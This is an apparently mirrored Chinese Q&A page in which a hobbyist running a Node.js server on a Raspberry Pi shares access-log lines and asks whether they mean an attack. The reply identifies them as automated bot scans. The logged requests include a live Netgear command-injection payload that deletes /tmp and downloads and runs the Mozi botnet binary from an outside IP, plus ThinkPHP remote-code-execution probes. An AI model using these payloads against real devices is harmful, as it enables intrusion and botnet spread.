开始了我自己的 node.js web 服务器项目 - 这些 GET 请求是什么?
[英]Started my own node.js web server project - what are these GET requests?
问题描述
我最近设置了一个家庭 web 服务器来运行我的 node.js 并表达 web 应用程序(使用 Raspberry Pi,基本上是为了弄清楚如何去做)。
在我的域上激活它后不久(几小时),我记录了以下 GET 请求:
0|app.js | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://218.77.224.248:55400/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 404 23.779 ms - 922
0|app.js | GET /solr/admin/info/system?wt=json 404 25.780 ms - 922
0|app.js | GET /?XDEBUG_SESSION_START=phpstorm 200 24.322 ms - 170
0|app.js | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 200 21.867 ms - 170
0|app.js | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 404 25.449 ms - 922
我的服务器受到攻击了吗?
如果是这样,攻击者是如何针对我的?
如何防止攻击并具有良好的安全性?
还是我读错了?
谢谢
1 个解决方案
解决方案1
1 已采纳 2020-08-01 23:59:15
你受到了攻击......但你很好,因为这些攻击不会影响 Node.JS。 https://forum.codeigniter.com/thread-75932.html
这些攻击可能只是自动攻击(因为它们只是向您的网络服务器抛出随机漏洞),攻击者可能是一个机器人,被编程为向网络服务器抛出常见漏洞。
不过,关于拥有良好的安全性……这是一件很难做到的事情。 我建议您从 Express 文档开始 ,然后在线查看 go 并查看结果。
当我重新启动 node.js web 服务器时,我的调用堆栈会发生什么情况?
[英]What happens to my call stack when I restart my node.js web server?
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.